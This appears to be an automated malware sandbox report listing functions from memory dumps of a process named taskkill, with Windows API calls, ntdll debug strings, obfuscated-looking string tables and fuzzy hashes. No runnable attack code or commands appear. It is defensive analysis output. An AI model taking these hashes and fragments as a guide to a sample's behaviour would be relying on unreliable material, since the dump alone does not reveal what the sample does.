                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3897564995.0000000000850000.00000040.80000000.00040000.00000000.sdmp, Offset: 00850000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_850000_taskkill.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FreeHeap
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3298025750-0
                                                                                                                                                                                                                                      • Opcode ID: 4c937ed6817131215a9a64047fbf09b864b48ad324a668257b2be1f721a64870
                                                                                                                                                                                                                                      • Instruction ID: 3fefd71e7e3fc90af0f2ba06d85c167b329faf51f5d93c114923baa4986443bf
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4c937ed6817131215a9a64047fbf09b864b48ad324a668257b2be1f721a64870
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9FE06D71200305BBDA14EE58DC45FAB33ADEFC9714F004018F908E7241C671B81486BA
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • RtlAllocateHeap.NTDLL(00861819,?,00875824,00861819,008754DE,00875824,?,00861819,008754DE,00001000,?,?,00000000), ref: 0087957C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3897564995.0000000000850000.00000040.80000000.00040000.00000000.sdmp, Offset: 00850000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_850000_taskkill.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                                                                                                                      • Opcode ID: eb6040b1fc1fb1cb6ed170ce4c5e49f7b4376ab8879b78008f84ee28e58e6294
                                                                                                                                                                                                                                      • Instruction ID: 667b82d7ad583cab446d3dfca3e3a88bb3cba8630931a3417ca2fbb736ffa752
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eb6040b1fc1fb1cb6ed170ce4c5e49f7b4376ab8879b78008f84ee28e58e6294
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CCE06D72204304BBD614EE58DC45FAB33ADEFC4710F004408F908A7241CA71B810C7B9
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • PostThreadMessageW.USER32(?,00000111), ref: 00860C17
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3897564995.0000000000850000.00000040.80000000.00040000.00000000.sdmp, Offset: 00850000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_850000_taskkill.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessagePostThread
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1836367815-0
                                                                                                                                                                                                                                      • Opcode ID: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                                                                                                                                                                                                                      • Instruction ID: 1e663e735b98c2ee492d0e16179f4d85efb921fac75554963846a21d638199ba
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2BD0A967B0000C3AAA024584ACC2CFFB72CEB88AA6F004063FB08E2040E6218E020AB0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SetErrorMode.KERNELBASE(00008003,?,?,00861B20,00877E1F,008754DE,00861AE6), ref: 00867F83
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3897564995.0000000000850000.00000040.80000000.00040000.00000000.sdmp, Offset: 00850000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_850000_taskkill.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorMode
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2340568224-0
                                                                                                                                                                                                                                      • Opcode ID: c52c1fa5334ab696d98bab4c8d1040c4722ab1b48ce8c77a9dc0070cc26c4455
                                                                                                                                                                                                                                      • Instruction ID: 99cb465c90f2e2d8bdc01bd8e81a04d60cf69d9fd576de6657ecc3c15852a01f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c52c1fa5334ab696d98bab4c8d1040c4722ab1b48ce8c77a9dc0070cc26c4455
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BCD05B7168420437F640B6A8CC07F96368CE744754F054064F90CDB2C3DD65F4004566
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetFileAttributesW.KERNELBASE ref: 0086818C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3897564995.0000000000850000.00000040.80000000.00040000.00000000.sdmp, Offset: 00850000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_850000_taskkill.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                                                                                                      • Opcode ID: 2e7a4eed9fab79d0e5256d37165c46f5f41f45354434236e51e00be68ebfa084
                                                                                                                                                                                                                                      • Instruction ID: a6d82206153ea5b0d0ffa7fb2955b3b5a8b2d2f3805f08c896b452e4fd84e6dd
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2e7a4eed9fab79d0e5256d37165c46f5f41f45354434236e51e00be68ebfa084
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0AD0A73515500449EB2086FCA8882623784FF87328F240E44E42CCB0E0C5619D5B9100
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SetErrorMode.KERNELBASE(00008003,?,?,00861B20,00877E1F,008754DE,00861AE6), ref: 00867F83
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3897564995.0000000000850000.00000040.80000000.00040000.00000000.sdmp, Offset: 00850000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_850000_taskkill.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorMode
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2340568224-0
                                                                                                                                                                                                                                      • Opcode ID: f5a20f4bfd334fce70a3f08ca5c2edc9af034d296d48a4c6e26f25239d57e607
                                                                                                                                                                                                                                      • Instruction ID: de5760984635ccd1d45126e8469ffca67ef75a41df383a42cb3368218812d0bc
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f5a20f4bfd334fce70a3f08ca5c2edc9af034d296d48a4c6e26f25239d57e607
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 12D0224259C5800EF303A3B02CB07A52BC40F9325EF0A028AC184810A7C2698A09C2D1
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3899568873.0000000004B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004C99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004C9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004D0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_4b70000_taskkill.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                                                                      • Opcode ID: 507259a0a7247bf8aa6c6d2441b6add725e700e69a44b200047a48920d6eddb5
                                                                                                                                                                                                                                      • Instruction ID: 7c0ed482aab02d91029373cfe542df0629eabaee31ff8a209a62201b0db882bc
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 507259a0a7247bf8aa6c6d2441b6add725e700e69a44b200047a48920d6eddb5
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 63B09B729015C5C5FF15F7614A087177914EFD1705F15C0E1D3070652E4738D1D5E175
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3899458998.0000000004A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A40000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_4a40000_taskkill.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                                                                                                                                                                      • API String ID: 0-3558027158
                                                                                                                                                                                                                                      • Opcode ID: 0995cb93dc2da986c3855a898eb1ba8e37eddfba7faad518aec15b83de7dbbf0
                                                                                                                                                                                                                                      • Instruction ID: 53d15920202cf6cba660764d1147c77d800d6286399c0c8f0f58c0478b820c8c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0995cb93dc2da986c3855a898eb1ba8e37eddfba7faad518aec15b83de7dbbf0
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B7914EF04482988AC7158F54A0652AFFFB1EBC6305F15816DE7E6BB243C3BE89058B85
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3899568873.0000000004B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004C99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004C9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004D0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_4b70000_taskkill.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ___swprintf_l
                                                                                                                                                                                                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                                                                                      • API String ID: 48624451-2108815105
                                                                                                                                                                                                                                      • Opcode ID: d66700ffd07f7303c8146339e4dbcf3e42d63cd92a5803b8491c8a1ee66e7570
                                                                                                                                                                                                                                      • Instruction ID: f39c00c2124a046a00c9c0f5eccf66fe6c83b1baac43de56be02fe247f888837
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d66700ffd07f7303c8146339e4dbcf3e42d63cd92a5803b8491c8a1ee66e7570
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7F51F6BAA04116BFDB14DFA98C9097EF7BCFB4820471481E9E569D3641E334FE009BA0
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3899568873.0000000004B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004C99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004C9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004D0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_4b70000_taskkill.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ___swprintf_l
                                                                                                                                                                                                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                                                                                      • API String ID: 48624451-2108815105
                                                                                                                                                                                                                                      • Opcode ID: 791528b60df33033706164cf9620fffa6fec3d9e4c612879cff9bacad4112f53
                                                                                                                                                                                                                                      • Instruction ID: f2f2ad28912378b772ce891b7df68fe4b77551d00c8340dc9cd17a3a0603baad
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 791528b60df33033706164cf9620fffa6fec3d9e4c612879cff9bacad4112f53
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D2510371A00645AFDB30DF5CCC9087EB7FAEB48204B4484A9E996D3651E7B4FA808F64
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 04C14787
                                                                                                                                                                                                                                      • ExecuteOptions, xrefs: 04C146A0
                                                                                                                                                                                                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04C14725
                                                                                                                                                                                                                                      • Execute=1, xrefs: 04C14713
                                                                                                                                                                                                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04C14655
                                                                                                                                                                                                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04C14742
                                                                                                                                                                                                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 04C146FC
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3899568873.0000000004B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004C99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004C9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004D0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_4b70000_taskkill.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                                                                                                      • API String ID: 0-484625025
                                                                                                                                                                                                                                      • Opcode ID: 54cb28af1479d7fc85b1abb677b543437179dfd170ba29afba90fcf95e97a2fa
                                                                                                                                                                                                                                      • Instruction ID: c90a6fdab6e7ecaaa1485b84c9abb75a5aa30f6ee7a1fa0ce28eb2e7d47d8d99
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 54cb28af1479d7fc85b1abb677b543437179dfd170ba29afba90fcf95e97a2fa
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8D510335600219BAEB14EAA9DC89BFA77B9EF09704F1404E9E505AB190FF70BE41DF50
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3899458998.0000000004A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A40000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_4a40000_taskkill.jbxd
Similarity
• API ID:
• String ID: HTQ[$LQWV$L]@L$QUY_$Q[YL$TQ[Y$YHHT$YLQW$YNQ^$YV_]$]@[P
• API String ID: 0-2395860490
• Opcode ID: 384a33eea867b0b9951205cb54ca9814fe172298f9fb4ce77b4bec0070fb2047
• Instruction ID: 5552c94ff39eba50794b6c3f431e81af6caf2441cd6bd36abf29f5fc1eeff400
• Opcode Fuzzy Hash: 384a33eea867b0b9951205cb54ca9814fe172298f9fb4ce77b4bec0070fb2047
• Instruction Fuzzy Hash: 0B3123B095034CEBCF19DF84D0846DDBBB1FB05B08F814159E86ABF211DB758666CB89
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.3899568873.0000000004B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B70000, based on PE: true
• Associated: 00000006.00000002.3899568873.0000000004C99000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3899568873.0000000004C9D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3899568873.0000000004D0E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_4b70000_taskkill.jbxd
Similarity
• API ID: __aulldvrm
• String ID: +$-$0$0
• API String ID: 1302938615-699404926
• Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
• Instruction ID: 65eef3602de74f2e32bc3a0ab4bffd13d8045eaade210778cdb2eab232868618
• Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
• Instruction Fuzzy Hash: C2819170E09249DEEF28CE6AC8517FEBBB1EFC5310F18459AD861A7690D734B841CB50
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.3899568873.0000000004B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B70000, based on PE: true
• Associated: 00000006.00000002.3899568873.0000000004C99000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3899568873.0000000004C9D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3899568873.0000000004D0E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_4b70000_taskkill.jbxd
Similarity
• API ID: ___swprintf_l
• String ID: %%%u$[$]:%u
• API String ID: 48624451-2819853543
• Opcode ID: c992e817f321ede7e7874d3dd34c51db1bd39653ecb719f2c6ebe87ed8e49fd0
• Instruction ID: 4b0e708e5610cb1aa2693053910635fd12337a263d20ee7e7c8d0d773add9838
• Opcode Fuzzy Hash: c992e817f321ede7e7874d3dd34c51db1bd39653ecb719f2c6ebe87ed8e49fd0
• Instruction Fuzzy Hash: D321537AA00119ABDB10EEB9DC40ABF77F9EF54644F0401A6ED05D3210E730AE459FA5
Strings
Memory Dump Source
• Source File: 00000006.00000002.3899458998.0000000004A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A40000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_4a40000_taskkill.jbxd
Similarity
• API ID:
• String ID: A]Tf$BX^_$TSzX$p_UC$sDX]$uc~x$|^KX
• API String ID: 0-1930476458
• Opcode ID: 4f04e769f2cd3a5102cdb32da622571c3dbdb771ce6b2871ddce329b7a25f3ec
• Instruction ID: 54b81a02d763d90922881e00ec2de9cc436c31fc6091beef0ec9ef8114b2be91
• Opcode Fuzzy Hash: 4f04e769f2cd3a5102cdb32da622571c3dbdb771ce6b2871ddce329b7a25f3ec
• Instruction Fuzzy Hash: 353153B051438CEACB18CF94D4456CEBBB2FF04358F918119E90A6F206DB768259CB89
Strings
• RTL: Re-Waiting, xrefs: 04C1031E
• RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04C102BD
• RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04C102E7
Memory Dump Source
• Source File: 00000006.00000002.3899568873.0000000004B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B70000, based on PE: true
• Associated: 00000006.00000002.3899568873.0000000004C99000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3899568873.0000000004C9D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3899568873.0000000004D0E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_4b70000_taskkill.jbxd
Similarity
• API ID:
• String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
• API String ID: 0-2474120054
• Opcode ID: 93218183d2c96598de2b8daa9bb691160e01de2280a47d85891b842f57a35da9
• Instruction ID: cfe2dec1f7299160884c4ad77a7527279ef5643a56093b47d367b63a5e98977e
• Opcode Fuzzy Hash: 93218183d2c96598de2b8daa9bb691160e01de2280a47d85891b842f57a35da9
• Instruction Fuzzy Hash: 81E1CD30604741DFD725CF29C884B2AB7E2FB89314F140AADE4A58B6E1E774F945DB42
Strings
• RTL: Re-Waiting, xrefs: 04C17BAC
• RTL: Resource at %p, xrefs: 04C17B8E
• RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04C17B7F
Memory Dump Source
• Source File: 00000006.00000002.3899568873.0000000004B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B70000, based on PE: true
• Associated: 00000006.00000002.3899568873.0000000004C99000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3899568873.0000000004C9D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3899568873.0000000004D0E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_4b70000_taskkill.jbxd
Similarity
• API ID:
• String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
• API String ID: 0-871070163
• Opcode ID: c78fbcb7e6ff34eb9305b2aed1ed29822e391ff166f3bb57f662327b5d910f89
• Instruction ID: 5fdb7df48ad0c335410c25ce05d723f314c3ff3c526dbe860ee12de08602f60d
• Opcode Fuzzy Hash: c78fbcb7e6ff34eb9305b2aed1ed29822e391ff166f3bb57f662327b5d910f89
• Instruction Fuzzy Hash: 5C4114313057029FDB24DE25C840F6AB7E6EF89710F100AADF85ADB690EB70F5059B91
APIs
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04C1728C
Strings
• RTL: Re-Waiting, xrefs: 04C172C1
• RTL: Resource at %p, xrefs: 04C172A3
• RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04C17294
Memory Dump Source
• Source File: 00000006.00000002.3899568873.0000000004B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B70000, based on PE: true
• Associated: 00000006.00000002.3899568873.0000000004C99000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3899568873.0000000004C9D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3899568873.0000000004D0E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_4b70000_taskkill.jbxd
Similarity
• API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
• String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
• API String ID: 885266447-605551621
• Opcode ID: 3c96866a5221c1a97ddd32c6f3335cde147648012d85a78e8c50bcdb73353505
• Instruction ID: 242083818c1e4afe74ea81cb9a0ce0809b8783e2b19f42a3eb222a32d9815ab6
• Opcode Fuzzy Hash: 3c96866a5221c1a97ddd32c6f3335cde147648012d85a78e8c50bcdb73353505
• Instruction Fuzzy Hash: C2411031705206ABEB20DE25CC41B76B7A6FB85714F200698F955AB250EB20F952ABD0

APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.3899568873.0000000004B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B70000, based on PE: true
• Associated: 00000006.00000002.3899568873.0000000004C99000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3899568873.0000000004C9D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3899568873.0000000004D0E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_4b70000_taskkill.jbxd
Similarity
• API ID: ___swprintf_l
• String ID: %%%u$]:%u
• API String ID: 48624451-3050659472
• Opcode ID: 179f11643f894699818d62e88d6eff8720f771bd36b4647fdfa3de15a0330ca5
• Instruction ID: 80e15a0397d4bb37a8a35d1da09d2f936d3060ceb388a884885969c38dbd2c33
• Opcode Fuzzy Hash: 179f11643f894699818d62e88d6eff8720f771bd36b4647fdfa3de15a0330ca5
• Instruction Fuzzy Hash: 7E318472A002199FDB20DE29CC40BEE77FDEB44614F4405D5ED49E3210EB30BA889FA1

APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.3899568873.0000000004B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B70000, based on PE: true
• Associated: 00000006.00000002.3899568873.0000000004C99000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3899568873.0000000004C9D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3899568873.0000000004D0E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_4b70000_taskkill.jbxd
Similarity
• API ID: __aulldvrm
• String ID: +$-
• API String ID: 1302938615-2137968064
• Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
• Instruction ID: e314d398f0abbc012fe97fe494a969d479ece6c69fdc74852ddce38826ab053c
• Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
• Instruction Fuzzy Hash: 3C919670E002569BDF24DE6BC891ABEB7A5FFC4720F14459AE855E72C0EF34E94097A0

Strings
Memory Dump Source
• Source File: 00000006.00000002.3899568873.0000000004B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B70000, based on PE: true
• Associated: 00000006.00000002.3899568873.0000000004C99000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3899568873.0000000004C9D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000006.00000002.3899568873.0000000004D0E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_4b70000_taskkill.jbxd
Similarity
• API ID:
• String ID: $$@
• API String ID: 0-1194432280
• Opcode ID: 8bb6187e91278a39b575f6e9cb04a23528cbed35932d44f4c22bb524056ff08a
• Instruction ID: ecbe2c7036d78717ef22d04e50bb131a968ecb7a13659241160e4530a5027ac0
• Opcode Fuzzy Hash: 8bb6187e91278a39b575f6e9cb04a23528cbed35932d44f4c22bb524056ff08a
• Instruction Fuzzy Hash: C7812FB5D002699BDB31CF54CC48BEEB7B4AB48754F0045DAE919B7280D770AE94DFA0